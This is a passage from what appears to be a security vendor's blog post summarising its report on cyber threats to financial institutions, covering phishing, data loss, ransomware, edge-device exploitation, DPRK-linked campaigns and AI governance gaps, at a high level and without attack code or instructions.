
Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

6. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI